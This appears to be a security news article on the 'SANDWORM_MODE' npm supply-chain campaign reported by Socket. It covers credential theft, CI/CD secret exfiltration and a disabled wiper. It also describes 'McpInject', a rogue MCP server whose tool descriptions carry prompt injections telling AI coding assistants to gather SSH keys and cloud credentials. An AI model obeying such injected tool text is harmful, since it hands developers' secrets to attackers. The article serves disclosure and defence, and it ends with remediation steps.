A recently observed npm supply-chain campaign dubbed ‘SANDWORM_MODE’ is infecting developer environments, siphoning CI/CD secrets, and targeting AI coding assistants, according to supply-chain security firm Socket.
The attack resembles earlier “Shai-Hulud” waves, embedding malicious code into npm packages that steals system data, access tokens, API keys, and environment secrets. It then propagates automatically by abusing compromised npm and GitHub identities.
The rogue packages, published under the npm names “official334” and “javaorg,” deploy a weaponized GitHub Action designed to harvest CI/CD secrets and exfiltrate them over HTTPS, with DNS fallback mechanisms to ensure data theft even under restricted network conditions.
Researchers say the malware includes GitHub API exfiltration, hook-based persistence, SSH propagation fallback, and a destructive kill switch that can wipe a victim’s home directory if access to GitHub or npm is lost. The wiper routine, researchers note, is currently disabled by default.
The campaign also incorporates a module called “McpInject,” which targets AI development environments. It sets up a malicious Model Context Protocol (MCP) server and injects it into tool configurations for popular assistants, including Claude Code, Claude Desktop, Cursor, Microsoft Visual Studio Code (via Continue), and Windsurf.
The rogue MCP server masquerades as a legitimate provider and registers three benign-looking tools embedded with prompt injection payloads. These prompts instruct AI assistants to read sensitive files, including SSH private keys, AWS credentials, npm configuration files, and local environment variables, and stage them for later exfiltration.
The malware also harvests API keys linked to major AI platforms such as Anthropic, Cohere, Fireworks AI, Google, Mistral AI, OpenAI, Replicate, and Together AI.
The payload contains a dormant polymorphic engine capable of calling a local Ollama instance running the DeepSeek Coder model. The engine can rewrite control flow, rename variables, inject junk code, and encode strings to evade detection. It was disabled in samples observed by the researchers.
Socket has notified the affected vendors of their findings. In response, Cloudflare took down the workers, npm has removed the malicious packages and GitHub has removed the threat actor's infrastructure.
Developers who installed any affected packages are urged to remove them immediately, rotate npm and GitHub tokens, reset CI secrets, and audit package.json, lockfiles, and .github/workflows/ for unauthorized modifications.